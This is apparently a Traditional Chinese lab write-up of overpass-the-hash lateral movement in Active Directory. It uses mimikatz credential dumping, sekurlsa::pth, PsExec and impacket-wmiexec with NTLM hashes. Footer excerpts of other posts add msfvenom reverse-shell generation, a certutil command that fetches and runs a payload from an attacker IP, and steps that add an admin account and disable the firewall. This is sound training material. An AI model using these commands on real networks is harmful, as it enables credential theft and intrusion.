Active Directory 中的橫向移動 - OPtH

-

 Active Directory 中的橫向移動 - OPtH


透過overpass the hash,我們可以「過度」濫用 NTLM 使用者哈希來獲得完整的 Kerberos 票證授予票證(TGT)。然後我們可以使用 TGT 來取得票據授予服務(TGS)。

先用已知的帳號密碼 jeff / HenchmanPutridBonbon11 登入到 Client76

└─$ xfreerdp /u:jeff /p:'HenchmanPutridBonbon11' /d:corp.com /v:192.168.191.76






按住 Shift 與滑鼠右鍵開啟某文字檔用另外一個使用者身分





這裡我們用網域的帳號密碼 jen / Nexus123! 來執行





Notepad 開啟後沒有任何需要,目的是要 jen 的憑證本機快取,所以可以直接關掉





接著直接執行 mimikatz,標準步驟 privilege::debug 再 sekurlsa::logonpasswords

目的是 jen 的 NTLM HASH "369def79d8372408bf6e93364cc93075"





接著一樣使用 mimikatz 工具執行 sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell

雖然使用的是 HASH PtH 驗證,但本質會將 NTLM 雜湊轉換為 Kerberos 票證並避免使用 NTLM 驗證,這是 sekurlsa::pth 指令的結果

如下圖,執行完畢後可以看到直接開啟了另一個 Powershell 視窗

但驗證 whoami 後卻發現是 jeff 而不是 jen,這是因為 whoami 無法檢查 Kerberos Token




執行 klist 可以看到也沒有 kerbers Token




接著我們使用 net use \\files04 後再執行一次 Klist 如下圖,可以看到都是帶入 jen 的驗證

這時候已經包含了 TGT & TGS 票眷




現在,我們已將 NTLM 雜湊轉換為 Kerberos TGT,從而允許我們使用任何依賴 Kerberos 驗證(而不是 NTLM)的工具,例如 Microsoft 的官方 PsExec 應用程式

PsExec 可以遠端執行命令,但不接受密碼雜湊。由於我們已經產生了 Kerberos 票證並在 PowerShell 會話中的 jen 上下文中進行操作 ,因此我們可以重複使用 TGT 來取得 files04 主機上的程式碼執行

指令 .\PsExec.exe \\files04 cmd

即會以 jen 的網域身分執行 TGS 連線到 files04,透過 whoami、hostname、ipconfig 確認如下





練習 : 執行跨接哈希技術以橫向移動到 web04 以取得位於管理員桌面上的標誌

直接 └─$ /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.191.72

答案就出來了



本章的正規解法來一下好了

先 offsec / lab,RDP 進 Client76,然後執行 mimikatz 接著使用 sekurlsa::pth /user:administrator /domain:corp.com /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:powershell

corp.com 網域 Administrator 的 HASH

一樣 whoami,Klist 看一下





net use \\web04 再 klist 看一下,現在就有看到 administrator 的 TGT & TGS 了




接著 .\PsExec.exe \\web04 cmd 就拿到 web04 的 remote shell 了,直接拿答案吧





留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容

Challenge 8 - Poseidon(0)

-
圖片
 Challenge 8 - Poseidon(0) 最近真的新的 LAB 連發,又多了一個 Challenge 8 : Poseidon 剛好近期有空,開來看看吧,又是一個三台的組合,應該又是 AD 題組 跟前一個題組 zeus 很像,都是三台面向使用者沒有內網的機器 ping 看看,看來三台都是 Windows Rustscan 掃掃看,看來第一台一樣是 DC └─$ rustscan -a 192.168.163.161 --scripts none --ulimit 5000 | tee rustscan 第二台看來也像 DC └─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第三台,└─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第一台 161 nmap 資訊 Domain : poseidon.yzx,電腦名稱 dc01 NetBIOS_Domain_Name : poseidon 第二台 162 nmap 資訊 這一台看來是 Sub Domain 的 DC,FQDN: dc02.sub.poseidon.yzx NetBIOS_Domain_Name : sub 第三台 163 nmap 資訊 ldapsearch 161,ldapsearch -v -x -b "DC=poseidon,DC=yzx" -H "ldap://192.168.163.161" "(objectclass=*)" ldapsearch 162,ldapsearch -v -x -b "DC=sub,DC=poseidon,DC=yzx" -H "ldap://192.168.163.162" "(objectclass=*)" 預設 smbclient 列舉都爬不到東西 帶入 poseidon\guest & sub\guest SMB 也都爬不到資訊 爬看看 161 Domain 的使用者,└─$ ./kerbrute_linux_amd64...
閱讀完整內容